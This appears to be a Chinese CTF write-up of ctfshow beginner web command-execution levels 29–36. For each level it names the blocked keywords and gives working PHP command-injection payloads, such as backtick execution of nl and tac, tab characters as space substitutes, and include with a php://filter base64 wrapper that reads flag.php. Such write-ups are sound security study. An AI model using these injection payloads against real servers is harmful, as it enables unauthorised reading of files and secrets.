ctfshow-web入门命令执行29

29

源代码给了禁用flag

使用tac、nl

复制代码
?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET["1"]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
emovie7 小时前
Python函数基础
linux·数据库·python
Chengbei117 小时前
Fortify_SCA_26.1版下载(OpenText SAST(Fortify SCA)26.1 windows/Linux/Mac)全版本下载
运维·安全·web安全·macos·网络安全·系统安全·代码审计
somi77 小时前
ARM-驱动-10自定义通信协议
linux·arm开发·自用
Alphapeople7 小时前
下载数据集
运维
GLAB-Mary7 小时前
华为职业认证新版全景图介绍及重认证规则变更预通知
运维·服务器·华为·华为认证
wanhengidc7 小时前
服务器 数据科技发展
运维·服务器·爬虫·科技·游戏·智能手机
j_xxx404_7 小时前
Linux:缓冲区
linux·运维·c++·后端
信创DevOps先锋7 小时前
中国企业DevOps工具链选型指南:本土化与安全可控引领技术决策新趋势
运维·安全·devops
亚空间仓鼠7 小时前
Ansible之Playbook(六):实例部署实战
linux·网络·ansible